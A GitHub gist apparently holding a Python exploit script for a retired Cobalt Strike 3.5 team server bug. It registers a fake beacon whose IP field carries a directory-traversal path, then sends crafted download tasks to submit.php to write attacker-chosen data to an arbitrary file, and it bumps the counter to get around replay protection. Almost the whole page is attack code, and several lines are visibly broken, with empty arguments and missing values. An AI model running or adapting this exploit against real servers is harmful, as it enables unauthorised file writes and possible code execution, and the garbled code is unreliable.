Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Retired Cobalt Strike 3.5 exploit example
# First we need to register a beacon with a directory traversal in the ip address field
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0]
# Generate symmetric keys (used later)
raw_aes_keys = os.urandom(16)
aes_key, hmac_key = generate_keys(raw_aes_keys)
m = Metadata(public_key=args.public_key, cs_version=3)
m.public_key = args.public_key = =
m.ver = "10.0"
m.intz = ip_address
m.comp =
m.user = args.username
m.is64 = '1' # 64-bit OS
m.barch = '1' # 64-bit beacon
m.raw_aes_keys = raw_aes_keys
enc = m.pack()
# register the beacon
print "[*] Staging beacon .."
register_beacon(enc,, args.uri,, args.ssl)
# Now we need to push a DOWNLOAD_START response to cause a file write
print "[*] Creating file .."
data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key)
# Send it to the server. This is the equivalent of touch(filepath)
# submit.php should be replaced with malleable C2 setting if applicable
beacon_checkin(, 'submit.php', data,,, args.ssl)
# Build another task which is going to write the data to the touched file
# We force the counter to be higher than the last task to avoid replay protection
print "[*] Sending data .."
data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100)
# Fire it..
beacon_checkin(, 'submit.php', data,,, args.ssl)
print "[+] Done!"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment